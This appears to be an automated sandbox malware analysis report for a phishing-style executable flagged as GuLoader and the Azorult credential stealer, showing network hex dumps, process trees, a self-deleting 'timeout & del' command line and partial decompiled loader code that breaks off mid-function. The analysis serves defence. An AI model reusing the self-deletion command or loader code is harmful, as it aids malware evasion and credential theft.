2022-11-28 11:46:56 UTC	0	IN	Data Raw: a5 fe d0 d5 2d 93 6a 5e ac 49 64 f7 7f f4 e7 b1 4e dc d1 82 66 fd fe 1a 6d 5b 9a 73 58 b6 63 40 d8 e6 00 3b 86 ae f4 56 b9 8a 13 e6 58 5b 3c 0d e8 cb f6 b6 c0 09 84 91 f6 e0 cf 34 19 00 90 e4 7f 1f 53 67 e2 e5 76 0a 3c a0 6e d8 64 14 18 1a e1 20 69 44 e9 a9 68 f2 12 6a 18 48 21 f0 0f d8 45 99 ec 41 2b 5a 52 04 96 4c 0f 11 0f 70 1b 33 00 cb ae bd 71 56 33 be ea 5b 48 e4 7a d0 4e 35 27 d1 92 b0 5c d8 d2 37 66 ff 47 ae 2d 39 9f d3 3e 30 72 a7 eb 35 d9 5e 0f 6e f8 c7 18 10 1f a3 17 9b 92 c0 fb 18 8e cb 35 ca 9e 35 57 db e1 52 80 17 60 d9 bb a7 cc 9f 50 a7 8c bc 19 4c be 22 bc 5d ab 11 f5 19 ef cd 2c f6 90 8c ed 44 1e ee 6a d9 5f 32 f1 30 4e 3b 4b c0 73 35 be 46 ff 46 e5 67 3c b2 ee 6c a6 20 1a b8 bb 9e d6 8d 40 24 dd a3 39 07 79 b4 0c 47 ea 5a 28 ff b0 d6 a1 Data Ascii: -j^IdNfm[sXc@;VX[<4Sgv<nd iDhjH!EA+ZRLp3qV3[HzN5'\7fG-9>0r5^n55WR`PL"],Dj_20N;Ks5FFg<l @$9yGZ(
2022-11-28 11:46:56 UTC	8	IN	Data Raw: 67 60 80 73 5d bc 46 ff c6 0d 22 da 4d 11 e9 66 55 57 8b 7b cb be b8 6b 64 dd c7 c6 37 1d 3d 2c 80 af ae 2c ff b0 d6 2c ad a3 82 b5 69 be ba 44 e5 f8 34 30 e1 ea 2a 70 54 f6 cb 42 29 fb 81 92 07 4b ee 63 21 60 5a 2b 2d 41 9a 9b dc 31 1b 84 40 64 9a a9 a5 f0 96 bf 9e 1a fc c2 cf 53 3e de d8 93 43 04 d5 24 30 29 09 df 3e 06 66 b0 ac b5 b7 51 4b 94 27 31 7d 6a 4b 90 6c 11 78 83 48 6e 5d 45 3a c2 9b 01 2a f2 13 59 a9 41 31 37 c6 4c ea c6 54 03 ef a2 29 51 16 d2 3a 8a 3a 66 b5 d1 30 79 99 3b c7 2b e4 b4 7f ba fa a9 28 14 dd 87 13 54 fe 38 42 05 39 ba 25 00 61 86 30 df 0c c4 3c 1f 02 ef a6 a3 88 b2 38 46 03 8e 6c f5 11 e5 56 e5 6a 06 87 f1 16 e3 af 03 3e 14 b6 e8 1d 5f 88 aa 2a 83 9c 27 19 82 38 f6 a4 f0 dd 00 89 35 57 da 99 ca ed d4 d2 77 d3 5e 68 77 8f f4 eb Data Ascii: g`s]F"MfUW{kd7=,,,iD40pTB)Kc!`Z+-A1@dS>C$0)>fQK'1}jKlxHn]E:YA17LT)Q::f0y;+(T8B9%a0<8FlVj>_*'85Ww^hw
2022-11-28 11:46:56 UTC	15	IN	Data Raw: 58 f3 b6 a2 df e1 7f c5 bd 2a e5 37 e4 85 e1 f2 07 fe 7b ce 01 75 9a 33 c3 03 a7 7b 81 48 fd 94 7c 15 52 a4 95 32 40 ab b3 30 a5 80 cb 2e a0 46 79 eb 84 f5 5a 3d 11 e5 cb ee b1 bf 8f 32 56 77 e1 67 99 d7 7c 4c 4a 04 d1 58 0b 8d 51 02 60 6a cd e6 89 90 98 f2 9d 9b 6b 23 1a 02 81 54 e4 d1 aa 50 6f 03 d4 06 a1 a9 69 93 dc e4 1f 78 af 4d 84 37 bc 00 22 b9 f0 e2 3f 20 db a0 6f f3 02 9a b1 2f a5 e9 f1 7e f0 db d4 94 8f 71 92 35 d0 13 c5 e1 92 15 38 8d 53 f2 f4 d1 f9 a5 97 fa 1b 95 99 30 a4 d6 f3 bb 5f 50 75 36 1d 52 b7 72 4b 4a d7 4e 54 db aa 13 9f 2b 4f 62 13 97 2c 1d 81 e9 3a 92 af cb c4 cb b4 3a 20 e2 88 46 25 5e 46 4c 40 12 14 e1 8e c1 03 13 65 27 03 65 03 86 02 9d c9 08 24 78 87 e0 07 c3 e8 27 cc 93 7d b7 fb 51 6a 04 05 80 19 f9 b3 79 29 c7 87 a4 21 e3 6d Data Ascii: X*7{u3{H\|R2@0.FyZ=2Vwg\|LJXQ`jk#TPoixM7"? o/~q58S0_Pu6RrKJNT+Ob,:: F%^FL@e'e$x'}Qjy)!m
2022-11-28 11:46:56 UTC	23	IN	Data Raw: 07 9a b3 0b eb 8a 7a 96 94 cd 73 fb 3a a6 bd a7 c4 f5 5b 7e 38 b5 51 aa d3 ed 7a b0 3f 9a 64 dc 49 98 3e 7c 34 4c 16 54 ed 91 24 ad c4 83 c7 a5 ac 89 ea 55 bd 2c a5 62 d6 09 72 8e 20 a4 08 0b c4 55 e1 84 e1 3d 99 07 2e 1c 88 de ba 6d a2 7a 0c 22 07 e8 5a aa f2 b8 92 4f 15 53 95 8d 0e 4d ba db 30 82 88 e8 da 2c 11 36 e0 31 d3 17 13 cb 98 eb c4 15 2b a9 73 12 bb bc 7b df bf 00 ef ec b5 19 fd 47 cc 2a 35 d2 64 03 f9 d6 a6 df e2 01 05 13 c8 98 12 6a ea c8 f1 0f f0 53 9d d2 69 9a 57 3f d9 41 66 8d ef 17 0c a8 92 6e f0 48 69 bb f2 a9 3b c2 a2 d8 a7 ec f1 1e c5 68 6d 12 79 35 8c d4 da fa 47 47 95 02 b0 93 4a b3 30 d3 d1 4d 3c bc 22 64 98 9d 7a 55 38 7d ea a9 6b f0 71 6e db 95 04 5a 56 32 b5 b9 b9 7a 29 85 25 86 ac 60 e3 45 63 ed a8 4f cd 71 e6 b3 35 67 44 a2 ee Data Ascii: zs:[~8Qz?dI>\|4LT$U,br U=.mz"ZOSM0,61+s{G*5djSiW?AfnHi;hmy5GGJ0M<"dzU8}kqnZV2z)%`EcOq5gD
2022-11-28 11:46:56 UTC	31	IN	Data Raw: 56 e0 09 a2 54 65 bc e6 da 0d eb b7 90 e4 79 cd 5e ee e7 5c c3 cf 0e cf c3 6d 67 79 77 34 be 46 17 08 51 98 c3 4d 5b f0 5b df e5 35 3e 3e 2b 72 bf 9e de a3 39 07 91 f0 b9 b8 15 d1 ad 5f 4d 29 5e 00 0e 66 c7 d3 16 4b 06 53 d3 34 d3 99 3e ba 26 8c 12 47 a7 80 e1 ec 6d 07 a8 ab f9 77 bc 64 5d c2 d6 f5 11 b0 87 d1 c1 37 34 8d 8d cd 9a f1 81 88 a3 40 5e 46 f8 d1 50 c7 52 0c ba 5e c7 8d 14 09 46 5d 44 2a 29 d0 07 29 d3 f5 17 41 19 65 25 da 31 27 33 64 40 a0 3e a6 fc 91 c5 7b 03 da ef 51 bd db d2 80 6a 62 4a f7 fa 5c fa 97 a3 1d 8a 02 9e b7 49 f2 ce 07 4f f9 14 cf 5a ab b6 b9 06 80 45 39 9b d1 29 fb 55 e0 0c e1 63 0a 6b a4 2a ae d8 ee 45 d8 f9 50 c4 16 f7 8f 16 59 5c 07 62 b3 85 c5 d2 42 f5 11 be 95 6e a8 55 0c 29 b3 20 47 a5 3c 14 b6 63 82 b7 07 53 db 7c c7 e4 Data Ascii: VTey^\mgyw4FQM[[5>>+r9_M)^fKS4>&Gmwd]74@^FPR^F]D))Ae%1'3d@>{QjbJ\IOZE9)UckEPY\bBnU) G<cS\|
2022-11-28 11:46:56 UTC	39	IN	Data Raw: 12 d5 f7 c7 1b 59 6b f8 a5 6a 0c 4e 2a 51 07 c4 ae 1a 49 d6 f4 b1 26 22 16 ed 33 21 bd a4 25 32 5a 93 5e 2b 8a 1f 30 e9 82 cb 38 65 e1 fc 3a ef c6 8a 00 9f f2 b2 95 7d 97 da 2e 92 f9 3b e2 04 45 1e 13 27 de 78 3e 2e e4 44 64 d1 44 5a 17 93 82 17 47 c5 0a fb a7 89 c2 7d 82 33 45 6c 7f ee 71 22 b5 c7 71 1c 81 68 1e aa 4c aa 28 92 79 e3 db c0 d0 0d e6 22 f5 90 99 17 42 16 3a c3 b2 3a 16 1b e5 e0 56 75 d1 34 3b 1f 9c ce 10 90 46 82 f7 6c 8d 57 c4 63 e0 70 20 15 97 46 a6 e6 17 8f 61 c3 2c f8 a6 91 22 bc b8 ce 95 de 97 76 73 ad e5 29 cb c6 24 59 98 23 59 eb 8a b3 ec 57 0a fb 24 7b 63 53 17 4b 9a a1 5f d7 4e da 1d 21 46 46 f1 3e ba b4 68 1f dd 58 74 9b 7d f6 50 6e ec 06 03 23 ec 1d ba 44 ac 8b 68 bb f5 74 39 4e 3a 27 bc b1 7d 80 09 b6 ed d2 c8 9c 3d 91 98 4a c3 Data Ascii: YkjN*QI&"3!%2Z^+08e:}.;E'x>.DdDZG}3Elq"qhL(y"B::Vu4;FlWcp Fa,"vs)$Y#YW${cSK_N!FF>hXt}Pn#Dht9N:'}=J
2022-11-28 11:46:56 UTC	47	IN	Data Raw: 5d 4e 7c d4 b6 64 d8 16 00 00 d8 a5 0b 33 e5 d5 89 e4 a7 de 62 c5 d2 f1 7e 93 52 84 f4 9f 01 10 9e a0 db 99 84 7d 90 16 4c 16 f4 33 7e bc 5d e1 8c 69 ea 7c a0 2f c8 45 ce f6 67 8d 74 a5 ee 2a 8c 23 91 1d 89 e5 90 91 1a 71 35 9c e7 3f a5 65 0b 8f ab 75 f8 35 d5 06 86 cf 42 c3 c6 8b 2e 5d 38 84 cd 0f b0 fa 6d 2e 02 49 b9 71 43 5c 27 fd af 46 09 6f 60 51 8d c2 06 66 62 28 12 bb eb cd 6f 49 05 e8 45 dc 19 a8 28 ae 78 c4 15 ab 86 66 4b 45 43 f0 4a e2 b2 fc 98 6d a0 9a e2 1a d4 9e 27 16 6e dc ed a6 df 39 c9 6c 69 9f 0d ad e1 57 a4 c9 59 60 27 ba 12 69 81 dc a5 ad 54 1b c9 b3 e6 f0 8f 90 66 f0 23 3a d2 8e a9 b8 3b 56 ac b7 1b 2a 5c cb 8d 6a 3e 6d 35 16 98 33 85 28 b8 b9 69 65 a0 f8 bc 95 02 42 3c 1d b9 54 ce e3 89 5d 5d c7 82 e7 95 8f 53 e4 d0 24 95 76 20 a1 48 Data Ascii: ]N\|d3b~R}L3~]i\|/Egt#q5?eu5B.]8m.IqC\'Fo`Qfb(oIE(xfKECJm'n9liWY`'iTf#:;V\j>m53(ieB<T]]S$v H
2022-11-28 11:46:56 UTC	55	IN	Data Raw: e2 4e e4 15 34 f0 ae e2 2a 05 0d 62 a9 de 6e 22 53 17 57 b8 40 cf 43 e6 c1 3b b6 42 a2 54 ab e1 f0 af cd 1f 3f 1a 84 ac ac f8 af 95 26 2a 3d 7c 75 86 81 b7 28 33 35 56 a5 b1 b9 1a 8c 31 3f ab a4 1c 2c f3 f8 bb 76 02 c3 bf db b7 a5 b2 42 89 e4 ad cf 5f 1b 28 74 b0 29 71 6b 93 da b3 fc cb af ea 0d 8a 64 a7 66 ab 6b fb 9a 43 67 b3 49 54 26 6d 73 78 d1 e9 fb fd 36 29 ed a4 e3 70 74 cd df 3e 43 b9 37 e1 cb 5a 89 94 e6 12 07 3d 44 ed 15 00 59 62 b3 45 3d c2 46 16 09 3c 75 27 93 5b 6a 93 32 1b a9 16 41 7a 16 94 f5 6f 18 81 c1 cd cd ad ec fc 91 1e 8f 87 87 bc 07 c9 24 d2 e5 c9 5c ef 51 cb 0c 9a c7 cb f8 86 ce 60 c5 33 e1 66 28 58 ba 47 30 a5 54 eb 0d 4a 80 45 92 46 22 cf 04 27 8e 6c 41 c7 7e 05 ac 25 46 38 bf ba 27 06 b9 4c c2 08 70 7e 6d b5 43 62 3e 00 6f 2c 93 Data Ascii: N4bn"SW@C;BT?&=\|u(35V1?,vB_(t)qkdfkCgIT&msx6)pt>C7Z=DYbE=F<u'[j2Azo$\Q`3f(XG0TJEF"'lA~%F8'Lp~mCb>o,
2022-11-28 11:46:56 UTC	62	IN	Data Raw: eb df 03 8e 84 0a ee d4 95 e3 3f ed f1 d6 62 98 1a a5 3e 14 5e e5 a5 48 f8 d8 50 c4 3a 1b 76 51 75 bb 9f 0d e1 74 f1 8c 85 ae 91 a1 46 5f c5 9c 59 db d8 0e a2 7f 69 39 c3 4b 5f 5e 48 35 b7 cd 0a 31 c3 c9 7c 4e 88 2f 96 4c 90 f9 58 84 7c 1c 47 3a 03 19 e0 53 6c 5c 61 00 4d 44 3f 84 78 77 11 e4 44 85 84 2d 44 79 86 1a 67 00 64 4d 04 ea 8d 9d cf f0 89 16 b9 e4 d3 04 1e 6c 0f 38 7a 39 77 e1 9f 27 76 1b 5b 29 5c 08 7f 2f 6e 78 55 f7 90 ed cf 0f 39 01 d4 74 5d 77 b8 29 df 87 a9 2c ad 4d f0 a4 d9 3d 4c bb f0 4d 3f 30 db a0 41 29 02 9a 7a f2 b2 d7 e6 17 5a 7e c3 60 e3 cb 91 b7 31 70 af 86 36 b0 2f 8b f2 0d 0b 54 d1 15 e0 8e 34 54 91 ed a5 c1 f7 04 2d 3a 0e c3 6f e8 f3 a5 5e a0 28 59 68 67 de b9 e8 46 80 75 13 97 92 48 4f 4d 9c 09 ce 99 f0 c2 01 f1 a5 fb 30 45 32 Data Ascii: ?b>^HP:vQutF_Yi9K_^H51\|N/LX\|G:Sl\aMD?xwD-DygdMl8z9w'v[)\/nxU9t]w),M=LM?0A)zZ~`1p6/T4T-:o^(YhgFuHOM0E2
2022-11-28 11:46:56 UTC	70	IN	Data Raw: 6b 77 32 45 46 25 03 4e 40 2e a5 37 82 9c 0c 07 6a 4a 98 66 07 1c f6 41 52 8c 65 5d 95 b6 01 b4 cf 02 00 ac 92 bb c4 1a 2a ec ec 69 d6 62 b7 dc 98 7d 84 d0 48 3b 60 8a 85 ae 2a 32 99 c2 48 1c aa a4 6f fa cc 81 ff 5c 06 2b 69 ea 1a 35 48 b1 ce 8c 53 3a a6 7c 11 44 5e ed 55 bd f2 01 75 f5 d0 f2 fb bf 53 7c dc 85 17 8b 1b 94 cb 07 56 98 d9 17 61 d9 b5 5b 76 a2 8f 86 7b b7 e6 96 f0 92 39 6e c4 1b 4d 43 11 6c 27 14 71 c5 ea ad 65 27 b6 61 8a 95 c0 09 cd 7e 32 8e dc 80 6a 43 70 c4 b2 4d 43 81 4d 50 d7 e3 73 1a 52 d4 60 20 cd 76 c3 32 88 dc 5e 4b 38 c4 9e e8 ff 62 38 97 1c c8 81 9a fc 56 97 c1 92 3f 6a e7 06 b1 0f bc ba a9 88 c8 0b b2 c5 2c 69 b3 82 44 c7 98 04 79 ff 34 51 c8 b9 db 76 7a 02 0f 01 1b 85 2e 3b f1 f5 8d ba ff 43 e1 9e 1e fd 44 46 e2 e0 f0 30 5b 95 Data Ascii: kw2EF%N@.7jJfARe]ib}H;`2Ho\+i5HS:\|D^UuS\|Va[v{9nMCl'qe'a~2jCpMCMPsR` v2^K8b8V?j,iDy4Qvz.;CDF0[
2022-11-28 11:46:56 UTC	78	IN	Data Raw: b7 91 42 b7 e3 0d e3 5d 8e b9 26 74 94 f4 5c 56 c6 82 e7 95 9b 53 4d 59 25 95 76 e0 e1 57 45 ad cc 56 4c 40 f1 91 fe 17 48 52 db 68 05 cf 81 f0 58 4c da dd 8c 39 22 31 c6 d9 66 88 dc 7b 05 f4 10 bb e1 65 2f 25 b7 42 ef cf b1 b0 de b8 8e ca 41 cb ba ba 0d 0d cb 4c 11 e1 23 54 e7 47 44 15 83 95 a8 dc 2f 5d c6 8c ec c0 f1 b8 15 d7 65 2f 08 fa ed a9 57 3a fd 18 b9 15 a3 60 e2 c9 a7 66 4a 3f 88 37 64 c5 ec 3e 6a f2 1d 05 87 d1 b4 35 e1 86 9a 71 68 a6 58 38 05 6f 3e 37 71 aa b5 6c 0e 96 83 f2 9c f7 46 de be d1 b8 f2 ce 1f ad c9 43 ea 16 b6 e9 38 16 72 6f 2e 57 88 37 cb 43 a5 d1 24 da e2 53 e5 0b da c3 8c 39 99 46 82 7d 26 53 90 51 da 63 37 a0 14 db 5e 40 23 36 54 8e 78 34 fe 46 be 76 2c ff 95 cc 73 25 2f ef 30 a5 f3 b6 2b 42 81 45 13 c0 ce 8f 04 0b 9f 51 fe 38 Data Ascii: B]&t\VSMY%vWEVL@HRhXL9"1f{e/%BAL#TGD/]e/W:`fJ?7d>j5qhX8o>7qlFC8ro.W7C$S9F}&SQc7^@#6Tx4Fv,s%/0+BEQ8
2022-11-28 11:46:56 UTC	86	IN	Data Raw: aa 86 61 37 c3 7e 71 43 ed ae d8 ea ad f2 21 f2 3b b1 72 17 ed a6 a3 b9 60 b3 85 eb 3a e6 24 ef 41 18 eb 0a ae f3 d6 75 d7 90 5b c1 99 33 c7 25 48 f8 bb 85 ad 39 1b 04 84 50 d5 d0 0f a4 89 49 b1 85 46 65 9e d7 db b7 e6 62 a5 97 0c e7 82 e4 ac 77 5e f4 70 5e 30 66 b7 4d 41 b9 82 69 70 a0 81 e4 44 b9 b8 5c 84 08 a1 a1 03 c4 d1 92 29 27 2a 32 02 08 bf 67 de 90 9f 47 cc 45 10 09 25 01 2a 84 1a 22 bb 3a 4d 04 02 7b 66 4a f0 fb 18 e0 b7 d1 04 09 b7 55 53 25 49 0d fe dc e6 89 f3 bf 11 b1 8c 0d 55 01 06 0a f5 d5 10 42 9a 9d 14 a3 5c 4b 16 69 53 cc f7 d3 77 ea b0 0f f4 54 50 38 96 f1 4d 39 e0 d3 b3 63 e0 15 30 26 81 d1 a7 9c 10 f9 db d4 2c aa e4 90 22 bc 78 c6 e5 34 b0 6a 37 ad 0d 0b bc 6b 0c 64 8e 46 5a 18 89 a7 c1 e0 c7 70 51 61 fd 79 3e 80 64 a1 49 2a 4e 20 e2 Data Ascii: a7~qC!;r`:$Au[3%H9PIFebw^p^0fMAipD\)'2gGE%":M{fJUS%IUB\KiSwTP8M9c0&,"x4j7kdFZpQay>dI*N
2022-11-28 11:46:56 UTC	94	IN	Data Raw: a0 28 be 5b 20 23 46 63 40 2d 2c 24 29 1f dd d4 34 53 f4 26 db 2f 00 56 b2 61 6f cd b5 49 8b ad b3 bf 52 c0 c1 a2 7f fc f8 9a fd 4e 3e 5e 45 11 f5 f2 2c 0f 78 d4 b9 08 38 61 ff ff d0 15 6b 0c 5b 2a 04 6e fb d5 9c 3a 59 27 bf c3 e7 b3 0b 60 85 01 a9 56 24 66 b0 80 b5 be a5 1f 0b cc f3 b9 e1 af de 69 45 43 e7 73 70 7d de 7d 99 9a a7 2e 04 49 c9 27 7d 22 a9 23 55 59 f3 9f 40 09 18 3f a4 82 8c a0 49 2e cf 24 58 08 be bb 43 c3 44 9a 73 ab c7 7b 12 c8 31 be 93 39 7a 3e 46 05 8d 2d 07 44 e6 47 7b ba 53 b3 d2 f5 cc 33 1b 00 06 49 85 33 e4 dc 42 5f b6 a8 92 6e c4 9f fc 8c eb d4 91 50 6d ff b0 2b 20 27 f5 cb 26 e0 83 ff 8f 7e 5e 9e 27 f1 fb 95 9f 1d de 96 bb b9 ff 97 e7 e6 a2 43 48 a4 30 00 5d 1f 98 ec 41 d4 2f a6 6c 3e c9 4e 11 f0 05 e3 5b b4 4e ef bd 19 9e b6 ff Data Ascii: ([ #Fc@-,$)4S&/VaoIRN>^E,x8ak[*n:Y'`V$fiECsp}}.I'}"#UY@?I.$XCDs{19z>F-DG{S3I3B_nPm+ '&~^'CH0]A/l>N[N
2022-11-28 11:46:56 UTC	101	IN	Data Raw: f1 18 25 47 90 9e 23 3c e4 7a d1 44 35 9d c1 d1 be 2c 6c b2 fa 29 47 35 e2 e0 18 f0 bc 95 a7 1a d4 cb 45 8f 31 68 1c 93 aa 38 7d 39 d0 08 bb 89 a5 ab 6a 9e a5 15 bf e0 51 32 a9 95 05 8c 79 3f eb d3 ad 8f a8 22 a7 ed bc 74 4c be 22 bc 5d 8b 11 f5 19 ab cd 14 f6 a7 8c da 44 58 ee 5d d9 67 32 c2 30 0a 3b 7e c0 59 35 92 46 92 46 84 67 4c b2 c4 6c a6 20 1a b8 f9 9e d6 8d 65 24 bc a3 49 07 09 b4 68 47 8b 5a 5c ff d1 d6 84 e8 0b d2 6c 2c 23 ea 42 e5 f7 34 3f 99 b3 6a 11 df de 37 32 c1 a5 67 08 f8 0b 2e 52 78 4d 3e cd 3d 59 a6 ec 9c 45 90 a5 bc 55 72 29 40 6e 69 20 77 5c f8 c8 cf b8 d1 eb 79 ff f3 20 d5 23 15 84 f6 b9 b5 3a 9e bb 2f 36 88 50 40 33 41 bd 65 b0 0a e0 e7 91 25 27 48 3d 12 03 6e 6a 25 ac 90 a9 51 36 db 5e 33 2b 8c 7a de c4 38 8c 78 34 8a 02 42 9e 3a Data Ascii: %G#<zD5,l)G5E1h8}9jQ2y?"tL"]DX]g20;~Y5FFgLl e$IhGZ\l,#B4?j72g.RxM>=YEUr)@ni w\y #:/6P@3Ae%'H=nj%Q6^3+z8x4B:
2022-11-28 11:46:56 UTC	109	IN	Data Raw: 42 9b 75 03 0d 6e 5d 94 cf 67 74 f0 f8 13 93 0a b9 3f 47 19 c2 dc f3 66 3c 44 33 17 87 c0 b9 73 c1 c5 97 ef d3 37 e1 8e 35 b8 05 76 b6 90 60 d7 3a f2 8a 3c d2 16 55 0a 28 ba af 67 90 5b 36 3a a7 70 7d f0 04 4e 8c 3c e4 d3 3d 3a ef 12 fd 97 b3 79 c2 b3 15 28 24 b4 72 f6 be 29 aa c5 12 82 01 a3 e9 8b 53 03 66 dc d8 d3 4b 1d 9d a7 9e 80 d5 69 cb d2 78 07 bf 22 49 7f 1b c9 fc 04 a7 13 f7 49 bb 74 0b fb 2e b3 d5 4a fe 5a 81 0f 54 18 a3 95 ca 0e 8f d4 b0 03 e5 d1 4e 12 ad 8a 0c 0d 32 b6 53 1c 82 f4 40 df 0b 18 19 9a d6 74 ba 2a e2 48 b0 b9 1f a5 4e d6 63 d6 75 50 ba e0 df bf cf 7d 55 c3 78 83 a6 a1 10 2a 8e c5 d8 74 1c 26 11 b4 6d 39 32 69 69 0b ed 83 32 9b 8a 83 19 7b a3 52 c2 65 21 7f 2e d2 19 e8 02 44 1b a8 34 40 5e 5d 01 71 0a 8a fb f6 e0 e4 9d 5d 3a 34 08 Data Ascii: Bun]gt?Gf<D3s75v`:<U(g[6:p}N<=:y($r)SfKix"IIt.JZTN2S@tHNcuP}Uxt&m92ii2{Re!.D4@^]q]:4

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Swift Mesaj#U0131#09971.exePID: 7596, Parent PID: 4572

General

Target ID:	1
Start time:	12:46:07
Start date:	28/11/2022
Path:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Imagebase:	0x400000
File size:	379329 bytes
MD5 hash:	310DF09294B852BAB67E158D95788150
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.7934819719.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Swift Mesaj#U0131#09971.exePID: 3172, Parent PID: 7596

General

Target ID:	4
Start time:	12:46:33
Start date:	28/11/2022
Path:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Imagebase:	0x400000
File size:	379329 bytes
MD5 hash:	310DF09294B852BAB67E158D95788150
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000003.8040635695.000000001D9B8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.7688018397.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000003.8040702551.000000001D9BC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6040, Parent PID: 3172

General

Target ID:	5
Start time:	12:47:10
Start date:	28/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Imagebase:	0x210000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4920, Parent PID: 6040

General

Target ID:	6
Start time:	12:47:10
Start date:	28/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff782ea0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 8964, Parent PID: 6040

General

Target ID:	7
Start time:	12:47:11
Start date:	28/11/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\timeout.exe 3
Imagebase:	0xa20000
File size:	25088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Swift Mesaj#U0131#09971.exePID: 7596, Parent PID: 4572COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	4.9%
Signature Coverage:	21.7%
Total number of Nodes:	1621
Total number of Limit Nodes:	53

Executed Functions

Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x434eec = _t51;
				if(_t51 != 6) {
					_t149 = E0040665C(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x434fb8 = _t56;
				SHGetFileInfoW(0x42b208, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E00406282(0x433ee0, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\Swift Mesaj#U0131#09971.exe\"";
				E00406282(_t193, _t60);
				 *0x434ee0 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\Swift Mesaj#U0131#09971.exe\"" == 0x22) {
					_t63 =  &M0043F002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B80(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E00403342(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E004038B6();
							__imp__OleUninitialize();
